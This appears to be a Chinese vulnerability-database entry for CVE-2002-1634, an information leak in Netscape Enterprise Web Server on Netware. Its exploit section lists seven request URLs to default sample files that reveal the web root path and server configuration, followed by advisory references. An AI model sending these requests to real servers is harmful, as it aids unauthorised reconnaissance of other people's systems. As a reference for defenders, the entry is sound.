Netware下的Netscape Enterprise Web服务器信息泄露漏洞-安全小百科

Netware下的Netscape Enterprise Web服务器信息泄露漏洞

漏洞ID	1106755	漏洞类型	设计错误
发布时间	2002-05-29	更新时间	2005-10-20
CVE编号	CVE-2002-1634	CNNVD-ID	CNNVD-200212-179
漏洞平台	Novell	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/21488
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-179

|漏洞详情

NetscapeEnterpriseWebServer是一款商业性质的WEB服务器。NetscapeEnterpriseWebServer包含的样例文件对用户的请求缺少正确处理，可导致远程攻击者获得系统相关的敏感信息。NetscapeEnterpriseWebServer默认安装后存在多个样例文件，攻击者可以通过请求这些文件获得WEB主目录安装路径信息和其他服务器配置信息。

|漏洞EXP

source: http://www.securityfocus.com/bid/4874/info

It has been reported that Netscape Enterprise Web Server may disclose path and system information to a remote user.

Netscape Enterprise Web Server for Netware contain several sample files which leak system information, this information can be obtained by remote users.

An attacker is able to send a request, for an affected sample file, that will cause the host to disclose the location of the web root path. Certain sample files will also reveal detailed system specific information. 

http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse

http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse

http://webserver/perl/samples/env.pl

http://webserver/perl/samples/lancgi.pl

http://webserver/perl/samples/volscgi.pl

http://webserver/perl/samples/ndslogin.pl

http://webserver/netbasic/websinfo.bas

|参考资料

来源:US-CERTVulnerabilityNote:VU#159203
名称:VU#159203
链接:http://www.kb.cert.org/vuls/id/159203
来源:www.securityfocus.com
链接:http://www.securityfocus.com/advisories/4158
来源:www.securityfocus.com
链接:http://www.securityfocus.com/advisories/4157
来源:support.novell.com
链接:http://support.novell.com/cgi-bin/search/searchtid.cgi?/10064452.htm
来源:XF
名称:netware-sample-information-disclosure(9212)
链接:http://xforce.iss.net/xforce/xfdb/9212
来源:BID
名称:4874
链接:http://www.securityfocus.com/bid/4874
来源:OSVDB
名称:17468
链接:http://www.osvdb.org/17468
来源:OSVDB
名称:17467
链接:http://www.osvdb.org/17467
来源:OSVDB
名称:17466
链接:http://www.osvdb.org/17466
来源:OSVDB
名称:17465
链接:http://www.osvdb.org/17465
来源:OSVDB
名称:17464
链接:http://www.osvdb.org/17464
来源:OSVDB
名称:17463
链接:http://www.osvdb.org/17463
来源:OSVDB
名称:17462
链接:http://www.osvdb.org/17462
来源:OSVDB
名称:17461
链接:http://www.osvdb.org/17461
来源：NSFOCUS
名称：2919
链接：http://www.nsfocus.net/vulndb/2919

相关推荐: EnGarde Secure Linux Guardian Digital WebTool提升根特权漏洞

EnGarde Secure Linux Guardian Digital WebTool提升根特权漏洞漏洞ID 1205186 漏洞类型未知发布时间 2001-10-18 更新时间 2001-10-18 CVE编号 CVE-2001-0739 CNNV…

文章版权归作者所有，未经允许请勿转载。

THE END